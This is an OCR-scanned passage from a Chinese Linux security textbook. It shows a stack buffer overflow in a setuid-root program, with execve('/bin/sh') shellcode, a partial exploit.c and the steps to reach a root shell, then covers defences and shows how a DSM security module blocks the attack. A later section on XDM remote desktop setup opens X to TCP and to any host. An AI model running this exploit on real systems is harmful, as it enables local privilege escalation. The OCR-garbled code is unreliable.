; 当 能 够 读 懂 上 面 的 源 代码 并 且 明 白 程 序 要 干什么 。 在 下 面 例子 的 输出 中 , 程序 
编译 之 后 , 我 们 试图 从 第 1 个 命令 行 参数 复制 10 字 节 到 buffer two, 但 给 它 已 分 配 的 内 存 只 有 
8 字 节 。 请 大 家 注意 在 内 存 中 buffer_one 紧 挨 在 buffer_two 的 后 面 ， 因 此 将 10 字 节 复制 到 
buffer_two 中 时 ， 最 后 两 个 字 节 90 会 溢出 到 buffer_one 中 ， 并 将 这 里 的 数据 覆盖 。 较 大 的 组 
冲 区 自然 会 溢 入 到 其 他 变量 中 , 但 是 如 果 使 用 了 一 个 足够 大 的 缓 溃 区 , 程序 会 崩溃 并 终止 。 如 
图 13.7 所 示 。 


/Over 2 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal 
[AFTER] buffer one is at Oxbf aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal 
[AFTER] value is at 9xbffff7f4 and 1s 163 x 161) 


图 13.7 注意 Segmentation fault 一 行 


图 13.7 中 ， 为 什么 得 到 Segmentation fault? 是 因为 地 址 超出 了 进程 段 的 允许 范围 ， 从 而 
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导致 Segmentationfault。 

好 ， 以 上 我 们 可 以 通过 溢出 来 修改 目标 程序 流程 ， 已 经 掌握 了 溢出 的 基本 原理 。 现 实生 活 
中 的 溢出 利用 当然 更 复杂 一 点 , 需要 更 多 的 系统 体系 结构 知识 和 小 技巧 。 相信 你 以 后 会 逐步 了 
解 到 所 谓 的 溢出 漏洞 。 


13.2.3 示例 


这 里 提供 一 个 练习 来 展示 一 个 缓冲 区 溢出 攻击 。 以 后 ， 我 们 将 使 用 相同 的 例子 ， 并 加 入 
DSM 模块 来 说 明 其 是 如 何 防止 这 样 的 攻击 发 生 的 。 
为 了 展示 一 个 成 功 的 缓冲 区 溢出 攻击 ， 需 要 下 面 的 步骤 : 
@ 找到 一 个 进程 ， 它 易于 被 缓冲 区 溢出 攻击 方式 所 攻击 。 
为 了 注入 最 大 的 危险 ， 该 进程 应 该 用 根 权 限 运 行 。 
决定 执行 什么 来 作为 缓冲 区 溢出 攻击 的 结果 。 
在 易于 被 攻击 的 进程 中 找到 一 种 方法 ， 以 启动 选择 的 进程 。 


在 我 们 的 例子 中 ， 创 建 下 列 程序 vulnerable.c 来 试图 使 之 溢出 : 


void main(int argc,char *argv[]){ 
char buffer[512]; 
Eargc >L) 
strcpy (buffer,argv[1]); 
} 


以 上 代码 把 输入 字符 串 复制 到 它 的 内 部 缓冲 区 中 , 而 没有 检查 缓冲 区 的 大 小 。 我 们 的 目标 
结果 是 有 一 个 用 根 权限 运行 的 进程 。 这 样 当 缓 冲 区 溢出 攻击 发 生 时 , 结果 将 会 取得 根 权 限 。 通 
常 一 个 进程 的 权限 是 创建 它 的 用 户 的 权限 。 然 而 ,在 一 个 SUID 进程 的 情况 下 ,该 程序 继承 了 
可 执行 文件 的 权限 ， 而 不 是 创建 它 的 用 户 的 权限 。 因此， 假定 可 执行 文件 ( 易 受 攻击 的 ) 是 用 
根 权 限 创 建 的 。 

现在 , 需要 决定 在 存在 缓冲 区 溢出 攻击 的 情况 下 运行 什么 程序 。 在 本 例 中 , 我 们 将 用 根 权 
限 来 启动 外 壳 。 该 代码 shellcode.c 看 上 去 如 下 面 的 代码 所 示 : 


#include 
void main(){ 
char *name[2]; 
name[0]="/bin/sh"; 
name [1]=NULL; 
execve (name [0] ,name, NULL); 


} 


我 们 需要 找到 上 面 C 代码 的 机 器 码 描述 。 为 了 把 它 存储 在 溢出 的 缓冲 区 ， 该 代码 必须 被 
独立 放置 ， 因 为 不 知道 在 堆栈 中 本 地 缓冲 区 的 地 址 是 什么 。 该 代码 不 能 包含 “\0” 字 节 ， 因 为 
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这 会 导致 strcpy 函数 停止 拷贝 。 为 了 使 代码 看 起 来 像 汇编 语言 形式 ， 编 译 它 ， 并 启动 GDB 调 
试 器 : 


$gcc -o shellcode gdb tatic shellcode.c 
$gdb shellcode 

$ (gdb) disassemble main 

$ (gdb) x/bx main+l 

$(gdb)x/bx main+2 (and so on...) 


在 修改 被 独立 放置 的 汇编 器 代码 ， 找 到 其 机 器 描述 ， 并 蔡 换 所 有 的 “\0” 字 符 之 后 ， 就 会 
得 到 一 种 机 器 语言 代码 ， 可 以 把 它 存储 在 一 个 缓冲 区 中 : 


char shellcode[]="\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ 
xb0O\xOb" 

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\x0d\x80\x31\xdb\x89\xd8\x40\xcd" 

"x80\xe8\xdc\xff\xff\xff/bin/sh"; 


这 个 缓冲 区 所 包含 的 代码 将 作为 该 溢出 攻击 的 结果 运行 。 
到 目前 为 止 ,我 们 已 经 建立 了 一 个 易 受 攻击 的 程序 。 现 在 将 创建 程序 exploit.c， 用 作 攻 击 
程序 : 


#include 
#define DEFAULT OFFSET 
0 
#define DEFAULT BUFFER SIZE 612 
#define NOP 0x90 
char shellcode[]="\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ 
xb0Nx0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"x80\xe8\xdc\xff\xff\xff/bin/sh"; 
unsigned long get esp(void){ 
_asm ("movl %esp,%eax"); 
} 
void main (int argc,char *argv[]){ 
char *buff,*ptr,*egg; 
log *addr ptr,addr; 
int offset=DEFAULT OFFSET, bsize=DEFAULT BUFFER SIZE; 
int 1; 
if (argc>1)bsize=atoi (argv[1]); 
if (argc>2)offset=atoi (argv[2]); 
if(! (buff=malloc(bsize))){ 
printf("Can't allocate memory.\n"); 
exit (0); 


这 个 示例 的 目的 是 为 了 展示 一 个 缓冲 区 溢出 攻击 。 以 后 ， 当 我 们 使 用 DSM 模块 来 防止 这 
种 攻击 时 ， 还 将 使 用 这 个 示例 。 为 了 展示 攻击 情形 ， 请 使 用 以 下 步骤 : 


加 编译 exploit.c 和 vulnerable.c 程序 : 


在 使 用 bash 或 tesh 的 情况 下 修改 /bin/sh 的 链接 ,因为 bash 和 tcsh 限 制 其 自己 的 setuid 
执行 ， 所 以 ， 必 须 创建 到 另外 一 个 外 这 的 链接 : 


改变 易 受 攻击 的 可 执行 文件 的 用 户 , 并 且 设 置 setuid 位 . 这 样 以 来 , 在 执行 该 程序 时 ， 
会 把 当前 用 户 的 userid 设置 为 该 执行 体 的 所 有 者 之 一 : 


以 一 个 正常 用 户 身份 在 环境 变量 中 创建 缓冲 区 : 
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$whoami 
user 


$./exploit 

加 执行 这 个 易 受 攻击 的 程序 : 
#./vulnerable SRET 

此 时 ， 我 们 应 该 已 经 取得 根 权 限 : 


Swhoami 


root 
到 此 该 外 壳 已 经 具有 了 根 权限 。 过 程 虽 然 简 单 ， 然 而 却 是 很 危险 的 。 
四 然后 ， 从 为 实现 缓冲 区 溢出 攻击 而 借用 的 外 这 中 退出 : 


$exit 


$exit 


恢复 原始 外 这: 


$mv sh.bak sh 


在 上 面 的 步骤 中 , 我 们 使 用 一 个 简单 的 程序 分 析 了 怎样 激活 一 个 缓冲 区 溢出 攻击 。 下 面 将 
分 析 现 有 的 解决 方案 ， 并 详细 讨论 怎样 使 用 DSM 来 防止 这 种 不 幸 事 件 的 发 生 。 


13.2.4 ”阻止 缓冲 区 溢出 攻击 解决 方案 


有 关 缓 冲 区 溢出 攻击 , 存在 这 样 翡 哀 的 事实 : 良好 的 编程 实践 不 可 能 彻底 清除 即使 是 潜在 
的 攻击 ; 为 此 , 为 了 防止 这 样 的 攻击 , 我 们 应 该 控制 到 敏感 系统 的 存 取 ,安装 新 软件 来 更 改 或 
蔡 换 可 被 攻击 的 软件 ， 以 及 清晰 了 解 当 系 统 成 为 攻击 对 象 时 一 个 缓冲 区 溢出 攻击 的 外 观 表现 。 
既然 缓冲 区 游 出 攻击 是 最 常见 的 攻击 之 一 ， 那 么 存在 许多 种 试图 阻止 它们 的 方案 。 


1. 编写 正确 的 代码 检查 所 分 配 的 缓冲 区 大 小 


例如 ,使 用 stmcpy 来 代替 strepy。 在 前 面 的 vulnerable.c 代码 中 ,应 该 使 用 stmcpy 函数 来 
代替 strcpy 函数 。 然 而 ， 既 然 不 可 能 期 望 开发 者 书写 的 代码 总 是 正确 的 ， 那么 就 需要 建立 一 种 
系统 的 解决 方案 。 


2. 使 得 该 栈 段 成 为 不 可 执行 的 


由 于 缓冲 区 溢出 攻击 依赖 于 一 个 可 执行 栈 ,所 以 一 种 明显 的 解决 方案 是 使 得 该 栈 段 成 为 不 
可 执行 的 。 这 样 的 内 核 补丁 可 以 应 用 于 Linux 中 ， 使 用 此 方法 来 阻止 缓冲 区 溢出 攻击 。 但 是 ， 
在 信号 处 理 器 过 程 中 ， 它 将 产生 问题 。 

在 Linux 中 , 由 于 信号 处 理 器 的 返回 都 要 求 一 个 可 执行 栈 , 并 且 信号 处 理 器 在 一 个 操作 系 
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统 中 是 非常 关键 的 部 分 ， 所以， 必须 实现 一 个 信号 处 理 器 的 临时 可 执行 栈 。 通 过 从 系统 内 核 中 
删除 栈 执行 部 分 ， 就 能 阻止 缓冲 区 溢出 攻击 。 然 而 ， 这 种 方法 的 不 足 是 代码 不 可 移植 ， 并 且 需 
要 修改 操作 系统 的 处 理 行为 ， 而 其 结果 可 能 是 无 法 预料 的 。 

另外 一 种 方案 是 使 用 PaX 工程 。PaX 工程 的 目标 是 研究 多 种 防卫 机 制 来 抵制 对 软件 中 错 
误 〈 这 有 可 能 使 得 一 个 攻击 者 任意 地 读 / 写 被 攻击 任务 的 地 址 空间 ) 的 利用 ， 这 种 类 型 的 错误 
可 能 包含 在 其 他 形式 的 缓冲 区 溢出 错误 中 或 用 户 提供 的 格式 串 错误 中 。 


3. 材 盖 返回 地 址 


缓冲 区 溢出 攻击 可 能 发 生 在 堆栈 向 下 增长 的 处 理 器 环境 中 ,通过 移动 比 一 个 函数 中 本 地 组 
冲 区 所 能 存储 的 更 多 数据 , 就 可 以 覆盖 一 个 返回 地 址 。 这 种 情况 在 堆栈 向 上 增长 的 处 理 器 环境 
中 是 不 可 能 成 功 的 ， 因 为 返回 地 址 将 拥有 比 本 地 缓冲 区 更 低 的 地 址 。 因 此 ，strepy 函数 的 执行 
结果 是 把 数据 移动 到 更 高 端 地 址 ， 而 永远 不 会 达到 返回 地 址 。 当 然 ， 这 可 以 使 得 另外 一 些 堆栈 
不 被 返回 地 址 覆盖 。 因 此 ， 这 样 执行 的 结果 有 可 能 跳 转 到 我 们 的 外 壳 代 码 中 。 这 样 一 来 ， 另 一 
种 可 能 的 解决 方案 是 使 得 堆栈 向 上 增长 。 


4. 在 编译 器 中 实现 其 他 解决 方案 


当 调用 函数 时 ， 一 个 随机 的 额外 字段 被 放 到 栈 上 。 在 从 该 调用 退出 后 , 检查 这 个 字段 是 否 
被 毁 。 因 此 ， 可 以 在 编译 时 刻 使 用 这 一 解决 方案 ， 但 是 ， 需 要 重新 编译 所 有 的 现 有 程序 。 这 样 
以 来 ， 当 处 理 二 进 制 而 源 代 码 不 可 用 时 ， 就 可 能 出 现 问题 。 


5. 使 用 Linux 安全 模块 


本 中 主要 讨论 的 解决 方案 是 在 内 核 中 实现 的 ， 并 且 基 于 强制 性 安全 和 Linux 安全 模块 
(LSM) 技 术 。 其 中 一 种 解决 方案 是 由 美国 国家 安全 局 (NSA ) 提供 的 , 命名 为 安全 增强 的 Linux 
(SELinux) 。 另 一 种 解决 方案 是 由 爱立信 研究 开放 系统 实验 室 提供 的 ， 称 为 分 布 式 安全 模块 
(DSM) 。 上 面 这 两 种 解决 方案 的 原理 相似 。 它 们 都 是 基于 Linux 内 核 “ 钧 子 ”技术 ,但 是 
它们 也 有 区 别 , 主要 是 实现 、 安全 策略 、 性 能 、 可 用 性 等 有 所 不 同 。 第 一 种 方案 因 配 置 SE Linux 
有 些 复杂 ， 所 以 这 里 不 采用 这 种 方案 , 我 们 将 以 第 二 种 方案 为 例 ， 讨论 如 何 利用 DSM 模块 来 
防止 缓冲 区 溢出 攻击 。 


13.2.5 ”DSM 与 缓冲 区 溢出 攻击 


在 DSM 中 的 强制 存 取 控制 实现 并 不 仅 限于 传统 的 二 级 安全 ， 即 根 和 用 户 ， 相 反 ， 其 独立 
于 实现 部 分 的 安全 策略 决定 正在 执行 进程 的 存 取 权 限 。 另 外 ， 请 注意 ，DSM 是 基于 LSM 基 
础 结构 之 上 的 ， 但 是 ， 该 LSM 框架 并 没有 在 Linux 内 核 中 提供 任何 额外 的 安全 ， 只 是 提供 基 
础 结构 来 支持 安全 模块 的 开发 。 该 LSM 内 核 补丁 把 安全 字段 添加 到 内 核 数 据 结构 上 ， 并且 在 
内 核 代码 的 特定 位 置 插入 调用 ( 称 作 “钩子 或 Hook”) 来 执行 一 个 模块 特定 的 存 取 控制 检查 。 
我 们 回顾 上 面 的 shellcode.c 示例 程序 ， 当 时 我 们 试图 用 根 权 限 来 启动 外 壳 ， 为 此 ,该 缓冲 区 浇 
出 程序 必须 调用 execve 函数 。 
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13.2.6 ”利用 DSM 阻止 缓冲 区 溢出 攻击 
这 里 将 以 清晰 的 步骤 来 展示 如 何 使 用 DSM 模块 来 阻止 缓冲 区 溢出 攻击 。 
加 装载 DSM 模块 ， 从 而 以 根 权限 来 扩展 系统 安全 : 


$su 
$/sbin/insmod lsm.o # 由 于 历史 的 原因 , 该 模块 被 命名 为 1 sm 


$exit 

思 更 新 并 装载 安全 策略 ( 将 在 后 面 解释 这 里 的 指令 ) : 
$vi policy _ file 

并 添加 下 面 一 行 〈 如 果 不 存在 的 话 ) : 


1 2 128 0 
$./UpdatePolicy policy file 


在 DSI0.3 版 本 中 ,这 里 的 实现 被 进一步 增强 而 不 是 使 用 一 个 普通 文本 文件 来 表达 安全 策 
略 ， 现 在 它 使 用 XML 格式。 因此， 如 果 用 DSI 0.3 或 0.4 进行 试验 ， 则 要 使 用 XML 格式 表达 
策略 。 


贺 把 易 受 攻击 程序 的 安全 ID 改变 为 1: 


$su 
$SetSID vulnerable 1 


Qexit 


加 现在 已 经 能 够 再 次 实现 与 缓冲 区 溢出 攻击 相同 的 示例 了 : 


$whoami 

user 

$./exploit 
$./vulnerable $RET 


$Error ./vulnerable; not found 
这 时 检查 一 下 是 否 取得 根 权限 : 


$whoami 


上 面 代码 表示 ， 我 们 现在 还 是 一 个 正常 用 户 。 
贺 从 被 缓冲 区 溢出 攻击 的 被 跨越 的 外 这 中 退出 : 


$exit 
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当 执 行 第 二 个 ./vulnerable SRET 时 ， 返 回 一 个 错误 必须 改变 该 错误 代码 以 反映 在 此 真正 
发 生 的 事情 ) ， 并 且 系 统 将 不 会 允许 用 根 权 限 启 动 一 个 新 的 外 壳 。 

为 了 确保 我 们 的 模块 成 为 这 里 的 源 ， 可 以 卸载 DSM 模块 ， 并且 再 次 运行 该 易 受 攻击 的 程 
序 〈 见 上 面 的 步骤 4) 。 在 该 DSM 模块 被 卸载 之 后 ， 应 该 不 会 出 现 错误 消息 ， 而 且 外 壳 会 被 
以 与 以 前 相同 的 根 权限 所 启动 。 

下 面 将 解释 所 真正 发 生 的 事情 。 在 步骤 2 中 ， 通 过 添加 一 行 “1 2 128 0” 来 更 新 策略 。 其 
中 共有 4 个 字段 : source security ID (1)、target security ID (2)、class(128) 和 permission (0)。 这 
意味 着 具有 “security ID=1” 的 主体 不 能 在 具有 “security ID=2” 的 对 象 上 执行 “class=128” 
中 的 操作 。 我 们 以 这 种 方式 实现 称 作 DSI_CLASS_TRANSITION 的 “class 128”， 并 且 它 包含 
了 加 载 时 刻 的 ELF 可 执行 检查 。 

在 步骤 3 中 ， 把 “security ID 1” 赋 值 给 易 受 攻击 的 程序 。 默 认 情况 下 ， 如 果 没 有 在 另外 
的 安全 策略 文件 中 说 明 ， 那 么 所 有 的 主体 以 “securityid 2” 开 始 。 在 该 策略 记录 中 的 第 三 个 参 
数 是 128， 这 个 值 描 述 了 操作 请 参考 源 代码 ) 。 在 这 里 意味 着 跨越 一 个 进程 的 操作 。 因 此 ， 
当 具 有 “security ID 1” 的 易 受 攻击 的 程序 执行 存储 在 易 受 攻击 的 缓冲 区 中 的 代码 时 ， 该 系统 
调用 (0x80) 将 在 某 处 被 执行 。 该 系统 调用 把 执行 传递 到 内 核 ,然后 再 传递 到 嵌入 在 内 核 中 的 
安全 钩子 。 在 该 安全 模块 (DSM) 中 ， 易 受 攻击 的 主体 “security ID ”被 加 以 校 验 。 根 据 该 策 
略 ， 不 允许 实现 跨越 操作 。 

现在 为 了 保护 内 核 ， 必 须 找到 所 有 易 受 攻击 的 进程 ， 并 赋予 它们 不 允许 跨越 其 他 进程 的 
“security ID” 值 请 注意 ， 在 本 实验 中 不 必 拥 有 易 受 攻击 程序 的 源 代码 。 基 于 前 面 创建 的 测试 
进程 。 我 们 可 以 安全 地 假定 ， 新 的 添加 操作 的 代价 很 小 ， 大 致 范围 为 1% 一 2%。 


13.2.7 “小结 


缓冲 区 溢出 攻击 是 引信 注目 的 安全 弱点 之 一 , 因此 被 频繁 应 用 于 针对 Linux 和 类 UNIX 操 
作 系 统 的 大 部 分 安全 攻击 中 。DSM 的 实现 目的 正 是 为 了 预防 这 样 的 攻击 ， 而 且 它 是 作为 一 个 
Linux 模块 实现 的 。DSM 还 提供 了 许多 其 他 特性 ， 例 如 透明 地 控制 存 取 分 布 式 环境 下 的 Linux 
族 服 务 器 。 另 外 ， 还 有 下 面 几 点 应 该 注意 : 


@ 在 DSI 从 版 本 0.1 到 0.2 到 0.3， 再 到 现在 的 0.4 版 本 的 实现 中 ， 还 存在 很 多 更 改 。 因 
此 ,请 一 定 要 读 一 下 随 DSI 一 起 提供 的 文档 ， 以 确保 试验 是 否 适用 于 所 使 用 的 DSI 版 
本 。 

@ 有 关 更 多 信息 ， 请 访问 DSIDigSig 工程 网 站 ， 并 且 订 阅 DSI 邮 件 列表 。 


本 节 展 示 了 如 何 利用 DSM 实现 的 强制 存 取 控制 来 达到 防止 缓冲 区 溢出 攻击 之 目的 ， 而 
且 这 种 安全 机 制 是 在 执行 系统 的 不 同 级 上 实现 的 。 因 为 存在 许多 现 有 的 易 受 缓冲 区 溢出 所 攻击 
的 应 用 程序 ， 所 以 使 用 DSM 的 目标 之 一 是 使 安全 性 对 于 应 用 程序 成 为 透明 的 ， 以 便 即 使 现 有 
程序 在 不 做 任何 修改 的 情况 下 也 能 够 被 保护 。 该 DSM 源 代码 是 开源 的 ， 读 者 可 以 从 提供 的 
DSI Web 站 点 处 下 载 研究 。 
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14.1 应 用 Linux 远程 桌面 


14.1.1 X-Window 初步 


在 Linux 中 所 有 图 形 用 户 界 面 (GUI) 的 活动 都 是 基于 X-Window 系统 的 ， 通 常 称 为 X。 
开放 源 代码 版 本 的 和 是 XFree86， 从 Fedora Core 2 起 ，X-Window 是 基于 X.org 源 代 码 而 形成 
的 。X-Window 是 一 个 非常 出 色 的 图 形 系统 ， 你 应 该 抱怨 的 是 那些 不 稳定 的 包装 ， 而 不 是 
X-Window 本 身 ，X-Window 的 设计 非常 巧妙 ， 很 多 时 候 它 在 概念 上 比 其 他 窗口 系统 先进 ， 以 
至 于 经 过 很 多 年 它 仍然 是 工作 站 上 的 工业 标准 。X 的 一 个 非常 有 趣 的 方面 是 : 使 用 X 客户 端 
程序 ， 不 必 非 得 运行 在 于 X 显示 器 相同 的 X Server 上 。 这 就 意味 着 一 些 非常 强大 的 可 能 性 ， 
例如 使 用 低 端 计算 机 显示 器 , 而 实际 的 程序 是 从 网 络 中 更 强大 的 计算 机 上 启动 。 可 以 这 么 理解 ， 
X Server 运行 在 本 地 的 显示 器 上 , 而 客户 机 程序 是 从 远程 显示 器 上 运行 ， 并 在 本 地 显示 器 上 出 
现 ,， 即 这 两 年 来 炒 得 火热 的 云 计 算 概念 。X Server 客户 机 /服务 器 模型 工作 原理 如 图 14.1 所 示 。 


| mouse keyboard | 
X-Server 


X-Lib X-Lib 
[ES X-Protocol 
本 地 X-Client 本 地 X-Client 


远程 X-Client 


图 14.1 X Server 客户 机 /服务 器 模型 工作 原理 


所 以 ，X Server 不 是 你 登录 的 那 台 机 器 ,而 是 一 个 程序 ， 它 负责 在 某 台 机 器 上 接受 客户 的 
要 求 ,在 屏幕 上 显示 客户 请 求 的 图 形 , 并 且 把 消息 (键盘 ,鼠标 ,窗口 消息 ) 通知 给 客户 程序 。 
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14.1.2 理解 X Server 


使 用 和 时 ， 主 要 的 组 件 就 是 X Server〈 后 台 运 行 的 一 个 进程 ) ， 提 到 远程 桌面 ， 大 家 都 
容易 想到 Windows 系列 操作 系统 的 远程 桌面 功能 。 其 实 ， 在 Linux 下 实现 远程 桌面 的 功能 
方便 。 用 过 Linux 的 读者 都 知道 ， 通 过 telnet 或 SSH 可 以 远程 控制 Linux 主机 ， 不 过 那 都 是 基 
于 命令 行 的 ， 不 太 直观 。 由 于 Linux 本 身 就 支持 多 个 终端 ， 使 用 义 能 像 Windows 一 样 通过 远 
程 桌面 控制 Linux 主机 ， 不 用 自己 安装 Linux, 直接 在 Windows 操作 系统 下 就 可 以 使 用 图 形 界 
机 远程 操作 Linux 操作 系统 。 

在 Linux 下 实现 远程 桌面 是 一 件 比 较 简单 的 事情 ， 因 为 Linux 的 图 形 界面 X-Windows 设 
计 的 时 候 就 是 基于 C/S 模式 的 。 本 节 介 绍 使 用 X-Win32， 通 过 XDMCP+XDM 远程 连接 Linux 
主机 上 的 XFree86Server， 从 而 在 图 形 环境 下 远程 管理 Linux 主机 。 

简单 地 说 ，X-Window 是 由 Server〔( 服 务 器 ) 、Client〔( 客 户 端 ) 和 通信 通道 三 个 相关 的 
部 分 组 合 起 来 的 。 


1. Server 


Server 实际 上 是 控制 显示 器 和 输入 设备 〈 键 盘 和 鼠标 ) 的 程序 。Server 可 以 建立 视窗 ， 在 
视窗 中 绘制 图 形 和 输入 文字 ， 响 应 Client 程序 的 需求 (Requests) ， 但 不 会 自己 动作 ， 只 有 在 
Client 程序 提出 需求 后 才 完 成 动作 。 每 一 套 显 示 设 备 只 对 应 一 个 唯一 的 Server， 而 且 Server 一 
般 由 系统 的 供应 商 提供 ， 通 常 无 法 被 用 户 修改 。 对 于 操作 系统 而 言 ，Server 只 是 一 个 普通 的 用 
户 程序 而 已 ， 因 此 很 容易 换 新 的 版 本 ， 甚 至 是 第 三 方 提供 的 原始 程序 。 


2. Client 


Client 是 使 用 系统 视窗 功能 的 一 些 应 用 程序 。X 下 的 应 用 程序 称 作 Client， 它 是 Server 的 
客户 ， 要 求 Server 响应 它 的 需求 ， 完 成 特定 的 动作 。Client 无 法 直接 影响 视窗 或 显示 ， 只 能 送 
一 个 请 求 给 Server， 由 Server 来 完成 请 求 。 

Client 功能 大 致 可 分 为 两 部 分 : 向 Server 提出 需求 ， 为 用 户 执 行程 序 做 准备 。Client 程序 
和 X 通常 是 独立 的 。 通 常 应 用 程序 〈 特 别 是 大 型 的 标准 绘图 软件 、 统 计 软件 等 ) 对 许多 输出 
设备 具有 输出 的 能 力 ， 而 在 X 中 的 显示 只 是 Client 程序 许多 输出 格式 中 的 一 种 ， 所 以 ，Client 
程序 中 和 XX 相关 的 部 分 在 整个 程序 中 只 占 非 常 小 的 一 部 分 。 

用 户 可 以 通过 不 同 的 途径 使 用 Client 程序 : 通过 系统 提供 的 程序 来 使 用 ; 使 用 来 自 于 第 三 
方 的 软件 ， 或 者 用 户 自己 为 了 某 种 特殊 应 用 编写 Client 程序 。 

3. 通信 通道 

有 了 Server 和 Client， 它 们 之 间 就 要 通过 通信 通道 传输 一 些 信息 。 赁 借 这 个 通道 ，Client 
传送 需求 给 Server， 而 Server 回 传 状态 〈Status) 及 其 他 一 些 信息 给 Client。 Client 通过 函数 
库 来 使 用 通信 通道 。 在 系统 或 网 络 上 ， 支持 通信 形态 需求 的 是 内 建 于 系统 的 基本 的 X-Window 
函数 库 (Library) 。 只 要 Client 程序 利用 了 函数 库 ， 就 有 能 力 使 用 所 有 可 用 的 通信 方法 。 

这 里 的 Server 和 Client 两 个 概念 很 容易 混淆 。 如 果 从 一 台 Windows 机 器 上 使 用 X-Win32， 
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通过 XDMCP 登录 到 另 一 台 Linux 服务 器 上 ， 就 说 X-Win32 是 客户 端 CClient) ， Nant 
器 是 服务 器 (Server) ， 这 就 完全 搞 错 了 。 理 解 X-Window 的 工作 原理 ， 认 识 这 个 区 别 就 会 
明显 。X-Server 不 是 指 登 录 的 那 台 机 器 ， 而 是 指 一 个 程序 ， 它 负责 在 某 台 机 器 - We 
求 , 在 屏幕 上 显示 客户 请 求 的 图 形 , 并 且 把 消息 (键盘 、 鼠 标 和 窗口 消息 等 ) 通知 给 客户 程序 。 

我 们 下 面 看 一 个 例子 ， 体 会 一 下 。 

最 近 发 现 很 多 装 Oracle 的 朋友 喜欢 在 终端 下 去 启用 X， 但 都 失败 了 。 这 里 推荐 如 下 几 个 
方法 : 

@ Xmanager， 这 个 图 形 终端 工具 拉 好 用 的 。 

@ 直接 进入 义 界 面 。 用 xhost 授权 后 ， 一 切 都 会 OK! 


通过 如 图 14.2 所 示 的 菜单 打开 登录 窗口 ， 如 图 14.3 所 示 ， 选 择 Options 一 Configure Login 
Manager... 的 Security 页 面 ， 取 消 勾 选 Deny TCP connections to Xserver。 人 允许 gdm 作为 显示 管 
理 器 时 ， 启 动 会 话 时 监听 相应 的 TCP 端口 。 


[System \ Ta [Parrowe Accesswany [securny [Users 
号 @ Aunenecaaon 
Prererences = ， 二 
区 oa c nme 
罗 Documentaron ,| 下 orpey enable Dod 
, Logm 
全 roump 
He 
加 ep © reyvoard 
i 
8 About GNONE | By Language 
入 ouroe = Logical volume Nanagement ee 
i 
画 suspend 
© user rofConngure me egn ee 
Dsnut Down 展 Neworr er 


图 14.2 Login Screen 菜单 


图 14.3 Security 页 面 


通过 VNC 直接 启动 X-Window， 启 动 界面 如 图 14.4 所 示 ， 登 录 界 面 如 图 14.5 所 示 。 


Foot 本 localhos 七 ~ 
Ble Ede Vew Jarminal Tabs Help 
CKET(137) : REGISTRATION; REQUEST; BROADCAST 

ss; NBT UDP PA| 


s: NBT UDP Ph 


图 14.4 直接 启动 X-Window 
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am 
Treeretocsthost -1# vncviever connect 192.169.0.2:5901 


1.2 for x - puilt Jan 15 2007 19:33:32 
copyrlgnr (C) 2902-2005 RealyNC Lta. 
See nttp://w. realvnc .com for 1nformation on VNC. 


2918 
cted to host 192.168.9.2 port 5901 
RFS protocol version 3.8 


图 14.5 登录 界面 


14.1.3 在 Linux 下 配置 XDM 


在 Linux 下 要 实现 远程 图 形 桌 面 ， 还 必须 搞 清楚 XDMCP、XDM 和 XFS 几 个 概念 。 

XDMCP (X Display Manager Control Protocol) 是 一 种 网 络 协 议 ， 由 它 来 建立 图 形 客户 端 
程序 与 X-Window 服务 器 的 连接 与 通信 。XDM (X Display Manager) 用 来 启动 X-Window 服 
务 器 ， 并 管理 图 形 客户 端 程序 的 登录 、 会 话 和 启动 窗口 管理 器 (KDE 或 GNOME) 等 。KDE 
和 GNOME 也 提供 了 自己 的 XDM 实现 , 分 别 叫 做 KDM 和 GDM。XFS (X Font Server) 可 以 
由 一 台 服 务 器 来 统一 提供 字体 ， 这 样 远程 图 形 客户 端 程序 就 不 需要 单独 安装 字体 了 。 

同时 , 在 Linux 主机 上 必须 安装 X-Window， 特 别 注意 要 把 XDM 和 XFS 两 个 组 件 也 安装 
上 。 如 果 安 装 了 KDM 或 GDM， 也 可 以 不 安装 XDM。 但 这 里 所 描述 的 是 XDM 的 配置 过 程 ， 
KDM 或 GDM 的 配置 过 程 略 有 不 同 。 

安装 好 软件 包 ， 就 可 以 开始 配置 XDM 了 。 进 入 /etc/X11/xdm 目录 ， 修 改 xdm-config (XDM 主 
要 配置 文件 ) 、Xaccess〈 访 问 控制 文件 ) 、Xservers 〈 本 地 显示 或 远程 显示 配置 文件 ) 三 个 文件 。 

首先 修改 xdm-config 文件 ， 找 到 最 后 几 行 : 

! SECURITY: do not listen for XDMCP or Chooser requests 


! Comment out this line if you want to manage X terminals with xdm 
DisplayManager.requestPort: 0 


用 “!” 号 把 最 后 一 行 注 释 掉 ， 否 则 XDM 就 不 会 监听 XDMCP 的 连接 。 


!DisplayManager.requestPort: 0， 
然后 修改 Xaccess 文件 ， 这 是 控制 客户 端 访问 的 配置 文件 ， 找 到 下 面 这 一 行 : 
# * #any host can get a login window 


把 注释 符号 # 去 掉 ， 否 则 X-Window 不 允许 远程 机 器 连接 。 
最 后 修改 Xservers 文件 ， 找 到 最 后 一 行 : 


:0 local /usr/X11R6/bin/X 
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在 这 行 的 末尾 可 以 添加 义 选项 ， 以 便 使 这 些 选 项 在 启动 X 时 生效 , 要 知道 , X 是 为 网 络 准备 
的 显示 器 ， 这 就 是 说 桌面 上 指向 显示 应 用 程序 的 连接 可 以 来 自 于 本 地 计算 机 或 网 络 计 算 机 ， 默 认 
情况 下 , Xserver 在 TCP 端口 6000 上 监听 显示 :0( 在 6001 上 监听 :1, 在 6002 上 监听 :2, 以 此 类 推 ) 。 
我 们 需要 用 # 符 号 把 该 行 注释 掉 ， 否 则 运行 XDM 时 ， 将 在 本 地 机 器 上 显示 图 形 界面 。 

当 这 些 配置 工作 完成 后 ， 就 可 以 运行 XDM， 可 以 直接 在 命令 行 中 输入 xdm 命令 了 。 但 

是 ， 这 样 并 不 能 确定 XDM 是 否 正 确 启动 。 

通过 运行 命令 “netstat -anp”， 可 以 查看 177 端口 (XDM 的 默认 端口 ) 是 否 被 XDM 比 
